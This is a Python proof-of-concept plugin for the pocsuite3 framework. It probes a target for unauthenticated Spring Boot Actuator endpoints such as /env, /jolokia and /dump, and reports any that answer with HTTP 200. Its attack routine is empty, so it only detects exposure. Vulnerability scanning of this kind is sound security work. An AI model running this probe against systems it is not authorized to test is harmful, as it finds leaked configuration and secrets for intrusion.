from pocsuite3.api import POCBase, VUL_TYPE, POC_CATEGORY, requests, register_poc, Output, logger

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0",
           "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", }

pathlist = ['/autoconfig', '/beans', '/env', '/actuator/env', '/dump', '/health', '/info', '/jolokia',
            '/actuator/jolokia', '/metrics',
            '/trace', ]


class SpringbootActuator(POCBase):
    vulID = '007'
    version = '3'
    author = ['cor0ps']
    vulDate = '2020-06-08'
    createDate = '2020-06-08'
    updateDate = '2020-06-08'
    references = ['https://www.freebuf.com/news/193509.html', 'https://mp.weixin.qq.com/s/o_tH_Qc9q2sPUQsNLGYRvA']
    name = 'Actuator 未授权访问'
    appName = 'SpringBootActuator'
    appVersion = 'All'
    appPowerLink = ''
    install_requires = ['']
    vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
    desc = '''
           Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块,
           Actuator 配置不当导致应用系统监控信息泄露对应用系统及其用户的危害是巨大的。
           Spring Boot < 1.5 默认未授权访问所有端点
           Spring Boot >= 1.5 默认只允许访问/health和/info端点，但是此安全性通常被应用程序开发人员禁用
            '''
    samples = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE
    protocol = POC_CATEGORY.PROTOCOL.HTTP

    def _verify(self):
        result = {}
        for path in pathlist:
            # 此处需要优化serlvet路径
            url = "{}{}".format(self.url, path)
            logger.info("Probe Url: {}".format(url))
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            #判断条件目前缺一个关键信息
            if response and response.status_code == 200:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['Info'] = self.name
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Path'] = path

        return self.parse_verify(result)

    def _attack(self):
        pass

    def _run(self):
        pass

    def parse_verify(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('SpringBootActuator target is not vulnerable')
        return output


register_poc(SpringbootActuator)
